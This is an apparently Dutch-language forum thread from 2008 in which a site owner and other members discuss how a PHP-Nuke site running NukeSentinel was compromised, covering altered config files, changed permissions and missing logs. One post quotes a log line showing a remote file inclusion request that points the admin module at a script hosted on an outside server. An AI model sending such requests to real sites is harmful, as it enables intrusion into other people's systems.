Gehackt of niet Gehackt?

Posted: Sat 19 Jan 2008 9:09

Beste,

Vandaag iets vreemds meegemaakt

drunkenmastersguild.eu is een domeinnaam die ik vroeger gebruikte
toen ik nog in een guild/clan zat.
Maar toen ik de game beu was en de guild/clan ook nooit iets gedaan
hebben voor de website en teamspeak die ik toen huurde van een
hoster.Heb ik die domeinnaam over genomen naar mijn eigen hosting.
Dus die heb ik dus verhuist die domeinnaam.

En zoals vele weten als hoster zijnde.Dat je dan veel e-mails krijgt met
als kan je me sponsoren enz enz.Nu ik toch nog die domeinnaam had en niet
meer gebruikte dacht ik waarom ook niet.Kost me niks verder dan enkel wat ruimte.

Dus ik heb daar een phpnuke 7.6 met de laatste patch en sentinel uptodate er op gezet.

Naar 2 weken krijg ik te zien op msn van die jongen in het bericht HELP ME!!
Ik zeg ja wat kan ik voor je doen.Me website is gehackt.
Huh? oke ik zal eens kijken hoor wat er aan de hand is.
En inderdaad ik zie een scherm met de gegevens info van database.

Nu zullen jullie denken dat de website niet goed was of sentinel was niet laatste patch.Geloof mij alles was uptodate.

Ik kon ook niet meer inloggen in database omdat de password was veranderd door de hacker zelf.
En toen ik ging kijken in de filles zelf.Zag ik dat de config.php wel heel erg groot was geworden 21 k was.Terwijl in de backup die een dag eerder was gemaakt nog op 8k stond.

Ook stond de config.php als permission 600 en als root apache.
Terwijl dat eerst stond als permission 644 en als root admin.

Ik heb dan even gevraagt aan die jongen of hij iets had veranderd in de permissions of in de root.
Hij heeft niks gedaan er in.En dat klopt ook toen ik me log files had bekeken

Hier onder zie je de screenshot die ik gemaakt heb van wat er op stond
toen ik de website ging bekijken.Zoals je ziet in de URL staat er
http://www.drunkenmasterguild.eu/index.php?http:// enz enz en dan coppermine.
coppermine stond er niet eens op.En ik weet dat coppermine zo lek als een zeef is.
Toch vreemd dat dit gebeurt is.
Je ziet ook in de screen dat de config.php met dikke bolt text staat.
Dit is dus echt een hacker geweest die enkel wou laten zien dat het wel kan.
Anders had hij ook wel die andere files aangepast en veranderd wat hij
niet gedaan heeft.Waarom hij verder niks gedaan heeft is omdat
er verder geen lol meer aan is denk ik om nog meer te doen.
Een klein kind of een scriptkidie zou juist alles veranderen.

Ik heb in iedergeval het ip adres en wat gegevens van de hacker zelf
maar daar zal ik weinig met kunnen doen.Of hij zou wel heel dom
zijn geweest om dit niet via een proxy server te hebben gedaan
en via zijn eigen adres van zijn modem van thuis af.

Maar goed het is allemaal geen ramp.Ik heb net voor die jongen ravenNuke er op ge gegooit.En helaas weet ik niet de e-mail adres van de hacker,anders zou ik
hem uitnodigen om het nog eens te proberen.

Dus ik wacht in volle spanning af wat jullie hier gaan van gaan denken
van mijn verhaal hier zo.

Sorry voor de typ fouten,je weet waarom dat is.

Administrator Joined: Aug 21, 2004 Posts: 2836

upgradedb.sql en de map nsnst_installer...
Dat lijkt mij nou juist niet zo handig.

BL

Posted: Sat 19 Jan 2008 11:33

Die staan op de screenshot,maar die stonden niet in de files meer Bleulion.
In de backup stonden ze ook niet in.

Posted: Sun 20 Jan 2008 0:16

vreemd verhaal, via de index.php.

Welke versie Sentinel had je erop gezet dan?

versies lager dan 2.5.13 bezitten nl een beveiligings lek, deze kun je daarom ook nergens meer downloaden.

Heb je alle accesslogs nog van die site?
eventueel alles wat met die "hack" te maken heeft.

ALs er een probleem in sentinel zit, ik zeg ALS, dan moet hier direct actie op ondernomen worden.

Een "echte" hacker zal nooit echte schade aanrichten op iets wat ie gehacked heeft, het gaat om de eer, kijk mij eens!!!
Zoals je zegt, scriptkiddies die vernaggelen alles omdat ze nik beters hebben te doen.

die coppermine staat in die include, niet op deze site.

Posted: Sun 20 Jan 2008 2:35

Beste.

Nee ik heb niet de acceslogs.Die had die jongen gedelte omdat hij dacht niet nodig te hebben.Sentinel 2.5.15 dus was uptodate.
Coppermine stond niet op de site.Is zelf niet eens geinstaleerd geweest.Hoe die dan in inlude komt te staan zoals jij zegt weet ik niet.

http://www.drunkenmastersguild.eu/modules/admin/admin.php?root=http://boludalnet.freehostia.com/57.gif?" "Mozilla/4.0 (compatible; MSIE 6.0; Wind

Dat is alles wat ik kon vinden helaas.Ik heb alles gedelete gewoon voor die jongen.Omdat ik het niet vertrouwde om het nog te redden,omdat ook de root was veranderd.

Geen ramp allemaal,alleen de vraag hoe kon dit gebeuren?

Toen ik ravenNuke instaleerde vandaag, en sentinel uprgade naar de laaste versie vlogen er gelijk al 3 hackers in.Maar die zitten nu lekker in sentinel verstopt.

Posted: Tue 22 Jan 2008 4:46

Ja het is echt waar Zero
Ik was met Terry bezig daar en liet mij alles zien. Geloofde het eerst ook niet maar alles wijst er op dat er echt gehackt is. Sentinel 2.5.15 stond er op. Geen coppermine want dat lekt nog al.

Ik vind het erg vreemd maar wat Terry aangeeft is echt waar.

Wim

Posted: Tue 22 Jan 2008 11:22

Terry, kun je mss op de server nog iets terug vinden mbt deze hack?
iets van server access logs.

Posted: Wed 23 Jan 2008 16:03

Terry had je een backup van die site ? met evt dbase.

maar euh.........
Was sentinel wel geconfigureerd??
ik bedoel, waren de blockers wel ingesteld?
en dan met name de script blocker??

NS Stopt dit nl wel MITS de blockers geactiveerd zijn!!!!!

Posted: Thu 24 Jan 2008 0:04

Helaas heb ik de back up er niet meer van.
Ik heb nog wel een backup.Maar die backup is van toen alles nog prima in orde was.
En daar kan ik die access logs niet meer in vinden.Komt omdat die jongen die map had verwijderd Sad

sentinel was prima geconfigureerd met de blockers goed ingesteld.

Ik denk eigenlijk dat de hacker via apache binnen gekomen is.De hacker heeft
eerst op een of andere manier de cmod van config.php op 777 gezet en als root apache.
En via apache kan de hacker dus op de website zoals je kan zien op de screenshot alles vrij geven.

Laat 1 ding duidelijk zijn, dat het hier niet over een kleine hacker gaat, maar over een
hacker die zeer slim is er in.

Je zou gaan denken is de server zelf dan lek of zo.Maar ook dat is totaal geen waar.
Dat hebben we allemaal na gecheckt.Als dat wel waar zou zijn, dan zouden er meer website zijn gehackt zijn op die server.
Nu wou die jongen een joomla er op hebben.Ook dat word aangevallen door hackers.Maar ze slagen er niet in om binnen te komen.

Wat ik zou kunnen doen is gewoon phpnuke er op terug zeten, en kijken of de hacker het nog eens gaat proberen.Enkel op die manier zouden we er achter kunnen komen hoe die hacker het gedaan heeft.

Junior Support Joined: Sep 10, 2006 Posts: 150

meestal ftp brute forcen
en ook apache hacking scannen de password maps enz....

Posted: Thu 24 Jan 2008 10:43

Ik zou zegen ga je gang .

De website is weer online.ik heb er ravennuke weer op gezet met uptodate sentinel.
En naar 2 minuten staan er al gelijk.

We have caught 5 shameful hackers.

Very Happy

NukeSentinel(tm) 2.5.15

Dus ik hoop dat ze veel gaan proberen weer.Ze zijn welkom.

Posted: Mon 28 Jan 2008 6:53

Beginner Joined: Jul 23, 2005 Posts: 9

Thanks.

De .htaccess groeit hier inmiddels behoorlijk...

Posted: Tue 29 Jan 2008 1:41

Ik heb de code er bij geplaatst.

Ik heb geen error pagina, dus het zou goed moeten zijn nu.

btw de snelheid is weer erg traag hier.

Pagina Rendering: 48.6 Seconden